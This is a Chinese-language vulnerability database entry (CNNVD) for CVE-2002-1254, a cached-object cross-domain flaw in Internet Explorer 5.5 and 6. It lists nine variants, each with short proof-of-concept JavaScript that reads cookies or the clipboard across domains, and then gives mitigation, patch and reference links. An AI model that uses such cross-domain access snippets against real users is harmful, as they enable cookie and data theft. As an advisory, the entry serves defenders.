漏洞信息详情
Microsoft Internet Explorer 安全漏洞
- CNNVD编号:CNNVD-200212-009
- 危害等级: 高危
- CVE编号: CVE-2002-1254
- 漏洞类型: 其他
- 发布时间: 2002-10-22
- 威胁类型: 远程
- 更新时间: 2021-07-27
- 厂 商: microsoft
- 漏洞来源: GreyMagic Software...
漏洞简介
Microsoft Internet Explorer(IE)是美国微软(Microsoft)公司的一款Windows操作系统附带的Web浏览器。
Microsoft Internet Explorer是微软开发和维护的WEB浏览器。Internet Explorer在处理缓存对象(cached objects)时存在问题,远程攻击者可以利用这个漏洞执行其他域和安全区域中的脚本代码,造成信息泄露等问题。当窗口之间通信的时候,MSIE安全机制必须确保页面在同一安全区域和同一域中,而缓存对象处理中MSIE安全机制对访问控制检查不充分。当攻击者在自己站点页面中打开窗口时IE会缓存主窗口到子窗口的引用(类似C的指针),虽然这时候子窗口内访问的URL可能已经改变了,但主窗口通过调用引用还是能够被控制,这样就可能使的直接访问不同域和不同安全区域中的内容。攻击者可以通过构建恶意WEB页面,并诱使用户点击,窃取目标用户COOKIE信息,泄露目标用户本地系统文件。下面9个漏洞都是相关于对象缓存问题,但是每个漏洞都是独立的漏洞,使用独立的方法进行利用。下面所描述的包含3个部分,\"Cache\"显示怎样缓存有问题的对象,\"Exploit\"显示漏洞怎样工作,\"Impact\"描述漏洞的危害。\"Full access\"表示可以访问任意域和任意安全区域中的任意页面文档对象模型(DOM)。1. showModalDialogCache: var fVuln=oWin.showModalDialog;Exploit - IE 5.5:fVuln(\"Javascript:alert(dialogArguments.document.cookie)\",oWin,\"\");Exploit - IE 6: 利用难度比较大,可使用\"analyze.dlg\"vulnerability.Impact: 在IE5.5中完全访问, IE6中\"My Computer\"安全区域可访问。2. externalCache: var oVuln=oWin.external;Exploit: oVuln.NavigateAndFind(\"Javascript:alert(document.cookie)\",\"\",\"\");Impact: Full access.3. createRangeCache: var fVuln=oWin.document.selection.createRange;Exploit: fVuln().pasteHTML(\"<imgsrc=\"Javascript:alert(document.cookie)\">\");Impact: Full access.4. elementFromPointCache: var fVuln=oWin.document.elementFromPoint;Exploit: alert(fVuln(1,1).document.cookie);Impact: Full access.5. getElementByIdCache: var fVuln=oWin.document.getElementById;Exploit: alert(fVuln(\"ElementIdInNewDoc\").document.cookie);Impact: Full access.6. getElementsByNameCache: var fVuln=oWin.document.getElementsByName;Exploit: alert(fVuln(\"ElementNameInNewDoc\")[0].document.cookie);Impact: Full access.7. getElementsByTagNameCache: var fVuln=oWin.document.getElementsByTagName;Exploit: alert(fVuln(\"BODY\")[0].document.cookie);Impact: Full access.8. execCommandCache: var fVuln=oWin.document.execCommand;Exploit: fVuln(\"SelectAll\"); fVuln(\"Copy\");alert(clipboardData.getData(\"text\"));Impact: 读区访问装载的文档9. clipboardDataCache: var oVuln=oWin.clipboardData;Exploit: alert(oVuln.getData(\"text\")); or oVuln.setData(\"text\",\"data\");Impact: 无需考虑设置,读/写访问剪贴板
漏洞公告
临时解决方法:
如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
* 暂时关闭浏览器的Active Scripting执行。
厂商补丁:
Microsoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Microsoft Patch ie6sp1
http://www.microsoft.com/windows/ie/downloads/critical/ie6sp1/default.asp" target="_blank">
http://www.microsoft.com/windows/ie/downloads/critical/ie6sp1/default.asp
参考网址
来源:XF
链接:http://www.iss.net/security_center/static/10436.php
来源:OVAL
链接:https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A408
来源:BUGTRAQ
链接:http://marc.info/?l=bugtraq&m=103530131201191&w=2
来源:XF
链接:http://www.iss.net/security_center/static/10437.php
来源:XF
链接:https://exchange.xforce.ibmcloud.com/vulnerabilities/10432
来源:OVAL
链接:https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A388
来源:XF
链接:http://www.iss.net/security_center/static/10439.php
来源:BID
链接:https://www.securityfocus.com/bid/6028
来源:MS
链接:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-066
来源:XF
链接:http://www.iss.net/security_center/static/10435.php
来源:XF
链接:http://www.iss.net/security_center/static/10438.php
来源:CIAC
链接:http://www.ciac.org/ciac/bulletins/n-018.sHTML
来源:MISC
链接:http://security.greymagic.com/adv/gm012-ie/
受影响实体
- Microsoft Ie:6.0:Sp1
- Microsoft Ie:6.0
- Microsoft Ie:5.5:Sp2
- Microsoft Ie:5.5:Sp1
- Microsoft Ie:5.5
补丁
暂无
评论